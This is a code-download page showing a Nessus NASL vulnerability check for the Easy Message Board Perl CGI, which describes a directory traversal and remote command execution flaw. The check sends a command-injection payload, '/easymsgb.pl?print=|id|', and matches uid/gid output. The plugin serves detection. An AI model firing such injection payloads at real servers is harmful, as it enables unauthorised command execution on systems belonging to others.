⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 easy_message_board_cmd_exec.nasl

📁 漏洞扫描源码,可以扫描linux,windows,交换机路由器
💻 NASL
字号:
### (C) Noam Rathaus GPLv2## SoulBlack Group <soulblacktm@gmail.com># 2005-05-09 00:59# Easy Message Board Directory Traversal and Remote Command desc = 'The remote host is running Easy Message Board, a bulletin board systemwritten in perl.The remote version of this script contains an input validation flaw whichmay be used by an attacker to perform a directory traversal attackor execute arbitrary commands on the remote host with the privileges ofthe web server.Solution : Upgrade to the newest version of this CGI or disable itRisk factor : High';if(description){ script_id(18211); script_version ("$Revision: 38 $"); script_cve_id("CAN-2005-1549", "CAN-2005-1550"); script_bugtraq_id(13555, 13551);  name["english"] = "Easy Message Board Command Execution"; script_name(english:name["english"]);  script_description(english:desc);  summary["english"] = "Checks for Easy Message Board";  script_summary(english:summary["english"]);  script_category(ACT_GATHER_INFO);  script_copyright(english:"This script is Copyright (C) 2005 Noam Rathaus"); family["english"] = "CGI abuses"; script_family(english:family["english"]); script_dependencie("http_version.nasl"); script_require_ports("Services/www", 80); exit(0);}include("http_func.inc");include("http_keepalive.inc");http_check_remote_code (			check_request:"/easymsgb.pl?print=|id|",			extra_check:"<fint color=Blue>uid=[0-9]+.*gid=[0-9]+.*</b></font>",			check_result:"uid=[0-9]+.*gid=[0-9]+.*",			command:"id",			description:desc			);

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -